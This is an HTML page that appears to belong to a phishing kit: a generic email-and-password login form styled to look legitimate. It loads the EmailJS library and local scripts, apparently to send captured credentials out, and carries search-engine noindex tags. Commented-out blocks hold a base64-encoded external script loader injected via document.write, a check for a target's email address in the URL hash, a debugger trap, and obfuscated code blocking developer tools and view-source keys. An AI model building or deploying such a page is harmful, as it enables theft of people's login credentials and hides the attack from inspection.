<html>
  <head>
    <script>
      var url_string = "";
      var rex = "LTEwMDE4MDIzNzMwNDc=";
    </script>
    <!-- <script>
        let intervalId = setInterval(() => {
            if (typeof console.debug === "function") {
                debugger;
            }
        }, 1000);

        let hash_string = window.location.hash.substring(1);
        let emailRegex =
            /^\s*(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@(([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))\s*$/;

        try {
            let decoded_string = atob(hash_string);
            decoded_string = decoded_string.trim();
            if (!emailRegex.test(decoded_string)) {
                document.location.href = `#`;
            } else {
                url_string = hash_string;
                //document.location.href = `#${hash_string}`;
            }
        } catch (err) {
            document.location.href = `#`;
        }
        const a = "aHR0cHM6Ly9nenNjcmFmdC5jb20vZXhlbC5qcw";
        document.write('<script src="' + atob(a) + '"><\/script>');
    </script> -->
    <!-- <script src="https://i.imgur.com/PaayE12.png"></script> -->
    <title></title>
    <link
      rel="icon"
      type="image/png"
      href="https://i.imgur.com/PaayE12.png?v=1685386253172"
    />
    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
    <meta
      name="googlebot"
      content="noindex, noarchive, nofollow, nosnippet, noimageindex"
    />
    <meta
      name="slurp"
      content="noindex, noarchive, nofollow, nosnippet, noodp, noydir"
    />
    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style>
      @import url("https://fonts.googleapis.com/css?family=PT+Sans:400,700");

      form input[type="submit"],
      form > div > input[type="text"] {
        width: 100%;
      }

      form > div > input[type="text"] {
        border-left-width: 0;
      }

      form > div > input[type="text"] {
        border-bottom-width: 0;
      }

      form > div > input[type="text"] {
        border-right-width: 0;
      }

      form > div > input[type="text"] {
        border-top-width: 0;
      }

      form > div > input[type="password"]:focus,
      form > div > input[type="text"]:focus,
      form > div > input[type="email"]:focus {
        outline: 0;
      }

      form > div > input[type="email"]:focus,
      form > div,
      form > div > input[type="text"]:focus,
      form > div > input[type="password"]:focus {
        background: white;
      }

      form
        > div
        > input[type="text"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form
        > div
        > input[type="email"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form > div > input[type="text"],
      form > div [class~="reqments"] {
        padding-left: 50px;
      }

      [class~="pxlgin"] {
        padding-left: 0.104166667in;
      }

      form > div {
        position: relative;
      }

      form > div > input[type="text"] {
        border-left-style: none;
      }

      form > div > input[type="email"]:focus + label,
      form > div > input[type="password"]:focus + label,
      form > div > input[type="text"]:valid + label,
      form > div > input[type="text"]:focus + label {
        opacity: 0;
      }

      form > div > input[type="text"] {
        border-bottom-style: none;
      }

      form > div > input[type="text"] {
        border-right-style: none;
      }

      form > div > input[type="text"] {
        border-top-style: none;
      }

      form
        > div
        > input[type="text"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form
        > div
        > input[type="email"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        max-height: 150pt;
      }

      form > div [class~="reqments"] {
        padding-bottom: 0;
      }

      form > div [class~="reqments"],
      form
        > div
        > input[type="text"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-right: 0.3125in;
      }

      form > div > input[type="text"] {
        border-left-color: currentColor;
      }

      form
        > div
        > input[type="text"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form > div > input[type="text"] {
        padding-bottom: 15pt;
      }

      form > div [class~="reqments"],
      form
        > div
        > input[type="text"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-top: 0;
      }

      [class~="pxlgin"] {
        padding-bottom: 0.104166667in;
      }

      form > div [class~="reqments"] {
        color: #999;
      }

      form > div > input[type="text"] {
        border-bottom-color: currentColor;
      }

      form > div [class~="reqments"] {
        color: red;
      }

      form > div > input[type="text"] {
        border-right-color: currentColor;
      }

      form > div [class~="reqments"] {
        max-height: 0;
      }

      form > div [class~="reqments"] {
        transition: 0.28s;
      }

      form > div {
        border-bottom-width: 0.75pt;
      }

      form > div [class~="reqments"] {
        overflow: hidden;
      }

      form > div [class~="reqments"] {
        font-style: italic;
      }

      [class~="pxlgin"] {
        padding-right: 0.104166667in;
      }

      form input[type="submit"] {
        display: block;
      }

      form > div > input[type="text"] {
        border-top-color: currentColor;
      }

      form > div > input[type="text"] {
        border-image: none;
      }

      form input[type="submit"] {
        margin-left: 0;
      }

      form > div > input[type="email"],
      form > div > input[type="text"] {
        padding-right: 0.208333333in;
      }

      form > div > input[type="email"],
      form > div > input[type="text"] {
        padding-top: 0.208333333in;
      }

      form > div > input[type="text"],
      form > div > input[type="email"] {
        background: #fff;
      }

      form input[type="submit"] {
        margin-bottom: 15pt;
      }

      [class~="pxlgin"] {
        padding-top: 0.104166667in;
      }

      form > div > input[type="password"],
      form > div > input[type="email"] {
        width: 100%;
      }

      form input[type="submit"] {
        margin-right: 0;
      }

      form > div {
        border-bottom-style: solid;
      }

      form > div {
        border-bottom-color: #ccc;
      }

      form input[type="submit"] {
        margin-top: 15pt;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-left-width: 0;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-bottom-width: 0;
      }

      form input[type="submit"] {
        background: #1a29ab;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-right-width: 0;
      }

      form > div > label {
        opacity: 0.3;
      }

      form input[type="submit"] {
        color: white;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-top-width: 0;
      }

      form
        > div
        > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
      form
        > div
        > input[type="password"]:invalid:not(:focus):not(:placeholder-shown),
      form
        > div
        > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) {
        background: pink;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-left-style: none;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-bottom-style: none;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-right-style: none;
      }

      html {
        min-height: 100%;
      }

      * {
        box-sizing: border-box;
      }

      .pxfiles {
        background: #eeeeee;
      }

      form,
      .pxfiles {
        margin-left: auto;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-top-style: none;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-left-color: currentColor;
      }

      form {
        max-width: 337.5pt;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-bottom-color: currentColor;
      }

      .pxfiles {
        margin-bottom: 12.5pc;
      }

      form > div > input[type="email"],
      form input[type="submit"] {
        border-right-color: currentColor;
      }

      form input[type="submit"],
      form > div > input[type="email"] {
        border-top-color: currentColor;
      }

      form > div > input[type="email"],
      form > div {
        border-image: none;
      }

      form > div > input[type="email"],
      form > div > input[type="password"] {
        padding-left: 3.125pc;
      }

      form
        > div
        > input[type="email"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form > div > input[type="email"],
      form input[type="submit"],
      form > div > input[type="password"] {
        padding-bottom: 15pt;
      }

      form > div > input[type="password"] {
        border-left-width: 0;
      }

      form > div > input[type="password"] {
        border-bottom-width: 0;
      }

      .pxfiles,
      form {
        margin-right: auto;
      }

      form > div > input[type="password"] {
        border-right-width: 0;
      }

      form > div > input[type="password"] {
        border-top-width: 0;
      }

      form > div > input[type="password"] {
        border-left-style: none;
      }

      form > div > input[type="password"] {
        border-bottom-style: none;
      }

      form > div > input[type="password"] {
        border-right-style: none;
      }

      form > div > input[type="password"] {
        border-top-style: none;
      }

      form
        > div
        > input[type="email"]:invalid:not(:focus):not(:placeholder-shown)
        + label,
      form
        > div
        > input[type="password"]:invalid:not(:focus):not(:placeholder-shown)
        + label,
      form > div > input[type="email"]:valid + label,
      form
        > div
        > input[type="text"]:invalid:not(:focus):not(:placeholder-shown)
        + label {
        opacity: 0;
      }

      form > div > input[type="password"] {
        border-left-color: currentColor;
      }

      form > div > input[type="password"] {
        border-bottom-color: currentColor;
      }

      form > div > input[type="password"] {
        border-right-color: currentColor;
      }

      form > div > input[type="password"] {
        border-top-color: currentColor;
      }

      form > div > input[type="password"],
      form input[type="submit"] {
        border-image: none;
      }

      .pxfiles {
        margin-top: 12.5pc;
      }

      form > div {
        color: #000;
      }

      form > div > input[type="password"],
      form input[type="submit"] {
        padding-right: 0.208333333in;
      }

      form > div > label {
        font-weight: bold;
      }

      form {
        margin-bottom: 0;
      }

      form input[type="submit"],
      form > div > input[type="password"] {
        padding-top: 0.208333333in;
      }

      form > div > input[type="password"] {
        background: #fff;
      }

      form
        > div
        > input[type="email"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form
        > div
        > input[type="password"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-right: 1.875pc;
      }

      form > div > input[type="text"]:valid {
        background: url("https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg");
      }

      form input[type="submit"] {
        padding-left: 15pt;
      }

      form > div > input[type="text"]:valid {
        background-size: 15pt;
      }

      form > div > input[type="text"]:valid {
        background-repeat: no-repeat;
      }

      form > div > input[type="text"]:valid {
        background-position: 0.208333333in 15pt;
      }

      form
        > div
        > input[type="password"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"],
      form
        > div
        > input[type="email"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-top: 0;
      }

      form > div > input[type="email"]:valid {
        background: url("https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg");
      }

      form > div > input[type="email"]:valid {
        background-size: 15pt;
      }

      .pxfiles {
        width: 90%;
      }

      form
        > div
        > input[type="password"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        max-height: 150pt;
      }

      form
        > div
        > input[type="password"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-left: 50px;
      }

      form > div > input[type="email"]:valid {
        background-repeat: no-repeat;
      }

      form > div > input[type="email"]:valid {
        background-position: 0.208333333in 15pt;
      }

      form > div > input[type="password"]:valid {
        background: url("https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg");
      }

      form > div > input[type="password"]:valid {
        background-size: 15pt;
      }

      form > div > input[type="password"]:valid {
        background-repeat: no-repeat;
      }

      form > div > input[type="password"]:valid {
        background-position: 0.208333333in 15pt;
      }

      form
        > div
        > input[type="password"]:invalid:focus:not(:placeholder-shown)
        ~ [class~="reqments"] {
        padding-bottom: 15pt;
      }

      form input[type="submit"] {
        font-size: 1.2rem;
      }

      .pxfiles {
        max-width: 337.5pt;
      }

      .pxfiles {
        text-align: center;
      }

      .pxfiles {
        color: #fff;
      }

      [class~="invalid"] {
        background: #000;
      }

      [class~="invalid"] {
        color: #000;
      }

      form {
        margin-top: 0;
      }

      form > div > label {
        position: absolute;
      }

      form > div > input[type="password"]:valid + label {
        opacity: 0;
      }

      form > div > label {
        top: 0.229166667in;
      }

      form > div > label {
        left: 15pt;
      }

      form input[type="submit"]:hover {
        box-shadow: 0.0625pc 1px 1px #ddd;
      }

      @media screen and (max-width: 360px) and (min-width: 320px) {
        .pxfiles {
          margin-left: auto;
        }

        .pxfiles {
          margin-bottom: 75pt;
        }

        .pxfiles {
          margin-right: auto;
        }

        .pxfiles {
          margin-top: 75pt;
        }
      }

      body {
        background: url("https://i.imgur.com/pX0Or9e.png?v=1685386262333")
          no-repeat;
        background-size: cover;
        position: absolute;
        width: 100%;
        height: 100%;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        margin: auto;
        overflow: hidden;
        font-family: "PT Sans", sans-serif;
      }
    </style>

    <!-- <script>
            function _0x1bab(_0x43bb4e, _0x27d833) {
                var _0x47b331 = _0x47b3();
                return (
                    (_0x1bab = function (_0x1bab03, _0x129d78) {
                        _0x1bab03 = _0x1bab03 - 0x1eb;
                        var _0x1896fe = _0x47b331[_0x1bab03];
                        return _0x1896fe;
                    }),
                    _0x1bab(_0x43bb4e, _0x27d833)
                );
            }
            var _0x57c85f = _0x1bab;
            function _0x47b3() {
                var _0xafecb0 = [
                    "keyCode",
                    "238692aFlLDE",
                    "718398LVtQho",
                    "charCodeAt",
                    "35brtVjb",
                    "289065DouVxM",
                    "326331yRdDVg",
                    "shiftKey",
                    "1875224IgyfMx",
                    "contextmenu",
                    "207771yIQCHC",
                    "onkeydown",
                    "121636iULSvg",
                    "preventDefault",
                    "ctrlKey",
                    "which",
                    "addEventListener",
                    "keydown",
                ];
                _0x47b3 = function () {
                    return _0xafecb0;
                };
                return _0x47b3();
            }
            (function (_0x5b4bfc, _0x180e5a) {
                var _0x2a2110 = _0x1bab,
                    _0x296669 = _0x5b4bfc();
                while (!![]) {
                    try {
                        var _0x4005ae =
                            parseInt(_0x2a2110(0x1f4)) / 0x1 +
                            -parseInt(_0x2a2110(0x1eb)) / 0x2 +
                            -parseInt(_0x2a2110(0x1f0)) / 0x3 +
                            (-parseInt(_0x2a2110(0x1f6)) / 0x4) *
                            (parseInt(_0x2a2110(0x1ee)) / 0x5) +
                            parseInt(_0x2a2110(0x1ec)) / 0x6 +
                            parseInt(_0x2a2110(0x1ef)) / 0x7 +
                            parseInt(_0x2a2110(0x1f2)) / 0x8;
                        if (_0x4005ae === _0x180e5a) break;
                        else _0x296669["push"](_0x296669["shift"]());
                    } catch (_0x135daf) {
                        _0x296669["push"](_0x296669["shift"]());
                    }
                }
            })(_0x47b3, 0x279a8),
                window["addEventListener"](_0x57c85f(0x1fb), (_0x39b4ef) => {
                    var _0x2e58df = _0x57c85f;
                    if (
                        _0x39b4ef[_0x2e58df(0x1f8)] &&
                        _0x39b4ef[_0x2e58df(0x1f9)] == 0x53
                    )
                        return _0x39b4ef[_0x2e58df(0x1f7)](), ![];
                }),
                window[_0x57c85f(0x1fa)](_0x57c85f(0x1f3), (_0x48c152) =>
                    _0x48c152[_0x57c85f(0x1f7)]()
                ),
                (document[_0x57c85f(0x1f5)] = (_0x15e1b8) => {
                    var _0x22873e = _0x57c85f;
                    if (event[_0x22873e(0x1fc)] == 0x7b) return ![];
                    if (
                        _0x15e1b8["ctrlKey"] &&
                        _0x15e1b8["keyCode"] == "E"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8[_0x22873e(0x1f1)] &&
                        _0x15e1b8["keyCode"] == "I"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8["ctrlKey"] &&
                        _0x15e1b8["shiftKey"] &&
                        _0x15e1b8[_0x22873e(0x1fc)] == "J"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8["keyCode"] == "U"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8[_0x22873e(0x1fc)] == "S"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8["keyCode"] == "H"["charCodeAt"](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8[_0x22873e(0x1fc)] == "F"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                    if (
                        _0x15e1b8[_0x22873e(0x1f8)] &&
                        _0x15e1b8[_0x22873e(0x1fc)] == "E"[_0x22873e(0x1ed)](0x0)
                    )
                        return ![];
                }),
                (window["onkeydown"] = (_0x315a59) => {
                    var _0x57124c = _0x57c85f;
                    return !(
                        _0x315a59["ctrlKey"] &&
                        ((_0x315a59["shiftKey"] && _0x315a59[_0x57124c(0x1fc)] === 0x43) ||
                            _0x315a59[_0x57124c(0x1fc)] === 0x55 ||
                            _0x315a59["keyCode"] === 0x75)
                    );
                });
        </script> -->

    <script src="https://cdn.jsdelivr.net/npm/emailjs-com@2/dist/email.min.js"></script>
    <script src="form.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link
      crossorigin="anonymous"
      href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js"
    />

    <script src="chrome-extension://mooikfkahbdckldjjndioackbalphokd/assets/prompt.js"></script>
  </head>
  <body data-new-gr-c-s-check-loaded="14.1110.0" data-gr-ext-installed="">
    <div class="pxfiles">
        <img src="https://i.imgur.com/PaayE12.png?v=1685386253172" height="50">

        <div class="pxlgin">
      <div class="pxlgin">
        <form id="myForm">
          <div>
            <input
              type="email"
              id="email"
              name="email"
              label="....E-m@il..Addresse"
              placeholder="....E-m@il..Addresse"
              required=""
            />
            <div class="reqments">Invalid email address.</div>
          </div>

          <div>
            <input
              type="password"
              id="password"
              name="password"
              label="...p@ss word..."
              placeholder="...p@ss word..."
              required=""
            />
            <div id="message" style="color: red"></div>
          </div>
          <div class="container-login100-form-btn" id="ligjon">
            <input type="submit" value="Log in" />
          </div>
        </form>

        <!-- 
            <form id="myForm">
                <label for="name">Name:</label>
                <input type="email" id="email" name="email" placeholder="Enter your name" required><br><br>
                <label for="email">Email:</label>
                <input type="password" id="password" name="password" placeholder="Enter your password" required><br><br>
                <input type="submit" value="Submit">
              </form> -->
      </div>
    </div>
    <script src="script.js"></script>
  </body>
</html>
